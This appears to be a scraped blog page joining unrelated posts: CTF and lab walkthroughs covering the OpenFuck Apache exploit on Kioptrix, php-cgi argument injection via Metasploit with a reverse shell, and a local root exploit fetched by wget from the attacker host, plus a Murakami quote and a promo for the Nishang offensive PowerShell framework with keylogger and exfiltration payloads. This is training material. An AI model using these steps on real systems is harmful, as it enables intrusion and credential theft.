 * http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
 *
 * OF version r00t VERY PRIV8 spabam
 * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
 * objdump -R /usr/sbin/httpd|grep free to get more targets
 * #hackarena irc.brasnet.org
 */
If you try to compile this without changing the code you'll end up with a bunch of errors and issues.
 

Luckily the paulsec write-up is very straightforward.  Here are the changes I made (editing in vi) to get this to compile.
1) Add these two headers:
#include
#include

2) Update the URL of the C file:
Search for packetstorm and replace the URL with the following
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Install the libssl-dev library if you don't have it already:

apt-get install libssl-dev

4) Update the declaration of variables:
Search for
unsigned char *p
and change it to
const unsigned char *p, *end;
5) Compile the code and Bob's your uncle:
To compile:
gcc -o exploit 764.c -lcrypto  


So the exploit compiled without any issues this time.  Now it’s time to move in for the kill.

root@moriarty:/tmp/exploit# ./exploit | grep -i redhat | grep "1.3.20"


This shows me that I’ve got two options for this exploit so I first try the 0x6a but it doesn’t quite work out.


So I try the second, 0x6b, and use OpenFuck's -c option to open 40 connections for a better shot at getting this to work (the exploit's usage line is ./exploit target box [port] [-c N], so this run is ./exploit 0x6b 192.168.2.90 443 -c 40).


And there it is.  Root access on Kioptrix Level 1.  Feel free to leave feedback and questions in the comments.

Double Kill - Hacker's Dome CTF Walk Through Part 1

This past weekend our Quantum Security CTF Team (consisting of Kamil @vavkamil and myself @jamesbower ) competed on the Hacker’s Dome – Double Kill CTF.  The competition consisted of two vulnerable machines with each containing both a user flag and a super user (root) flag.  We were able to capture both flags on the first server and here is the walk through.


First target: 10.200.0.4
Nmap scan:
==========
Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-26 17:06 CEST
Nmap scan report for 10.200.0.4
Host is up (0.067s latency).
Not shown: 996 closed ports
PORT    STATE    SERVICE     VERSION
22/tcp  open     ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3d:ab:fe:49:52:95:1e:f5:bf:9f:eb:ff:d8:6e:fb:16 (DSA)
|   2048 5c:43:53:0c:cb:50:57:3b:c6:b6:68:32:4d:fd:5c:f9 (RSA)
|_  256 f0:d9:63:a2:e0:b8:47:cc:46:32:19:2f:89:4b:a7:e4 (ECDSA)
80/tcp  open     http        Apache httpd 2.2.22 ((Ubuntu))
|_http-methods: No Allow or Public header in OPTIONS response (status code 302)
| http-title: phpMyAdmin
|_Requested resource was http://10.200.0.4/phpMyAdmin-4.2.6-all-languages/
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 9 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
SSH is relatively up to date and so is Apache so time to see what Nikto finds.
Nikto scan:
===========
---------------------------------------------------------------------------
+ Target IP:          10.200.0.4
+ Target Hostname:    10.200.0.4
+ Target Port:        80
+ Start Time:         2014-07-26 11:22:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ The anti-clickjacking X-Frame-Options header is not present.
+ Root page / redirects to: /phpMyAdmin-4.2.6-all-languages
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.php
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ /cgi-bin/perl?-v: Perl is installed in the CGI directory. This essentially gives attackers a system shell. Remove Perl from the CGI dir.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ Server leaks inodes via ETags, header found with file /icons/README, inode: 284076, size: 5108, mtime: Tue Aug 28 06:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution. See http://www.kb.cert.org/vuls/id/520827
+ 7355 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2014-07-26 11:40:41 (GMT-4) (1095 seconds)
---------------------------------------------------------------------------
At first I spent quite a bit of time in the /phpMyAdmin-4.2.6-all-languages directory trying to find some type of foothold.  But this remained fruitless and I felt like I was wasting too much time on one thing.  I decided to continue enumerating to see if anything else would appear that I could use.
More enumeration:
=================
Dirb finds nothing of real interest.
http://10.200.0.4/cgi-bin/


Going back over my Nikto results I see this (OSVDB-: /?-s: PHP allows retrieval of the source code via the -s parameter, and may allow command execution.)
I wasn't familiar with this vulnerability so I dug a little deeper, came across a couple of great articles about it, and eventually found out that Metasploit already had a module for it.  Great!
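Nikto's /?-s finding is the php-cgi argument-injection bug (CVE-2012-1823): when a request's query string contains no literal '=', php-cgi receives it as command-line options, so ?-s dumps the script's source and ?-d can set ini directives such as auto_prepend_file, which is what the Metasploit module leverages.  The following is an added example, not part of this write-up or of Metasploit: it reproduces that argv-parsing rule and runs it over a few constructed Apache access-log lines to flag exploitation attempts, including the percent-encoded form (%2d%64 for -d).  The log lines, client addresses and paths are made up.

```python
import re
from urllib.parse import unquote

# Enough of the common/combined log format to pull the client IP and request URI.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

def cgi_argv_from_query(query):
    """Reproduce the php-cgi rule behind CVE-2012-1823: a query string with no
    literal '=' is handed to the binary as command-line arguments, split on '+'
    and percent-decoded. A query containing '=' is an ordinary query string."""
    if "=" in query or not query:
        return []
    return [unquote(tok) for tok in query.split("+") if tok]

def injected_switches(uri):
    """php-cgi switches (-s, -d, -n, -T, ...) smuggled into a request URI."""
    _, _, query = uri.partition("?")
    return [arg for arg in cgi_argv_from_query(query) if arg.startswith("-")]

def scan_access_log(lines):
    """Return (client_ip, uri, switches) for every request carrying switches."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        switches = injected_switches(m.group("uri"))
        if switches:
            hits.append((m.group("ip"), m.group("uri"), switches))
    return hits

# Constructed sample log lines (made-up hosts, timestamps and sizes).
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Jul/2014:11:40:41 -0400] "GET /?-s HTTP/1.1" 200 1523',
    '10.0.0.5 - - [26/Jul/2014:11:40:42 -0400] "POST /index.php?%2d%64+allow_url_include%3d1'
    '+%2d%64+auto_prepend_file%3dphp://input HTTP/1.1" 200 512',
    '10.0.0.7 - - [26/Jul/2014:11:41:00 -0400] "GET /index.php?page=about HTTP/1.1" 200 2048',
    '10.0.0.7 - - [26/Jul/2014:11:41:03 -0400] "GET /search?q=-s HTTP/1.1" 200 900',
    '10.0.0.9 - - [26/Jul/2014:11:41:10 -0400] "GET /phpMyAdmin-4.2.6-all-languages/ HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, uri, switches in scan_access_log(SAMPLE_LOG):
        print(ip, uri, switches)
```

Note the fourth line: /search?q=-s is not flagged, because the '=' makes it a normal query string and php-cgi never sees it as argv; a naive grep for "-s" would produce a false positive there.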
Exploitation:
=============
https://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection


msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg_injection) > show options
Module options (exploit/multi/http/php_cgi_arg_injection):
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
PLESK        false            yes       Exploit Plesk
Proxies                       no        Use a proxy chain
RHOST                         yes       The target address
RPORT        80               yes       The target port
TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
VHOST                         no        HTTP server virtual host
Exploit target:
Id  Name
--  ----
0   Automatic
msf exploit(php_cgi_arg_injection) > set RHOST 10.200.0.4
RHOST => 10.200.0.4
msf exploit(php_cgi_arg_injection) > set LPORT 8080
LPORT => 8080
msf exploit(php_cgi_arg_injection) > exploit
[*] Started reverse handler on 172.16.237.66:8080
[*] Sending stage (40551 bytes) to 10.200.0.4
[*] Meterpreter session 1 opened (172.16.237.66:8080 -> 10.200.0.4:59780) at 2014-07-26 22:40:23 +0200
meterpreter > shell
Process 28156 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
First flag:
===========
www-data@ctf02-01:/var/www$ cat user-trohphy.txt
40a5e0e8aa540359d7e99304118cc86aebabd08c
With this we’re able to get the first user-trophy.txt and move on to getting a root shell.
Local root exploit:
===================
Target kernel (from uname): 3.2.0-23-generic, x86_64
Local root exploit used: http://www.exploit-db.com/exploits/33589/
www-data@ctf02-01:/tmp/infinity$ wget 172.16.237.66/exploit.c
wget 172.16.237.66/exploit.c
--2014-07-26 23:42:11--  http://172.16.237.66/exploit.c
Connecting to 172.16.237.66:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3845 (3.8K) [text/x-csrc]
Saving to: `exploit.c'
100%[======================================>] 3,845       --.-K/s   in 0s
2014-07-26 23:42:11 (20.3 MB/s) - `exploit.c' saved [3845/3845]
www-data@ctf02-01:/tmp/infinity$ gcc exploit.c -O2 -o vnik
gcc exploit.c -O2 -o vnik
www-data@ctf02-01:/tmp/infinity$ ./vnik 0
./vnik 0
IDT addr = 0xffffffff81dd7000
Using int = 3 with offset = -49063
root@ctf02-01:/tmp/infinity# whoami
whoami
root
root@ctf02-01:/tmp/infinity# cd /root
cd /root
root@ctf02-01:~# ls
ls
superuser-trophy.txt
Second flag:
===========
root@ctf02-01:~# cat superuser-trophy.txt
cat superuser-trophy.txt
8f8bc25a81e76ffd51e534eb0633eeb0c70cdf01
root@ctf02-01:~#

Creative Structure is Key by Haruki Murakami

There is a quote I read today by Haruki Murakami that really made me sit back and think about how I handle all my daily tasks and projects, especially with my obsession lately for absolute peak performance in my life.

"When I'm in writing mode for a novel, I get up at four a.m. and work for five or six hours.  In the afternoon, I run for ten kilometers or swim for fifteen-hundred meters (or do both), then I read a bit and listen to some music.  I go to bed at nine p.m.  I keep to this routine every day without variation.
The repetition itself becomes the important thing; it's a form of mesmerism.  I mesmerize myself to reach a deeper state of mind.  But to hold to such a repetition for so long, six months to a year, requires a good amount of mental and physical strength.  In that sense, writing a long novel is like survival training.  Physical strength is as necessary as artistic sensitivity."

Own Windows with PowerShell using Nishang

Nishang is a framework and collection of scripts and payloads that enables the use of Windows PowerShell for offensive security and post-exploitation during penetration tests.  The scripts were written to meet the author's needs during real penetration tests.
PAYLOADS
It contains many interesting scripts like download and execute, keylogger, dns txt pwnage, wait for command and much more.
HELP
All payloads and scripts are Get-Help compatible. Use “Get-Help -full” on a PowerShell prompt to get full help details.
CHANGELOG for version 0.2.7

– DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely.  They also no longer stop automatically after running a script/command.
– DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
– Fixed a minor bug in DNS_TXT_Pwnage.
– All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
– Added Get-PassHashes payload.
– Added Download-Execute-PS payload.
– The keylogger logs only fresh keys after exfiltrating the keys 30 times.
– A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.
Download: http://bit.ly/nishang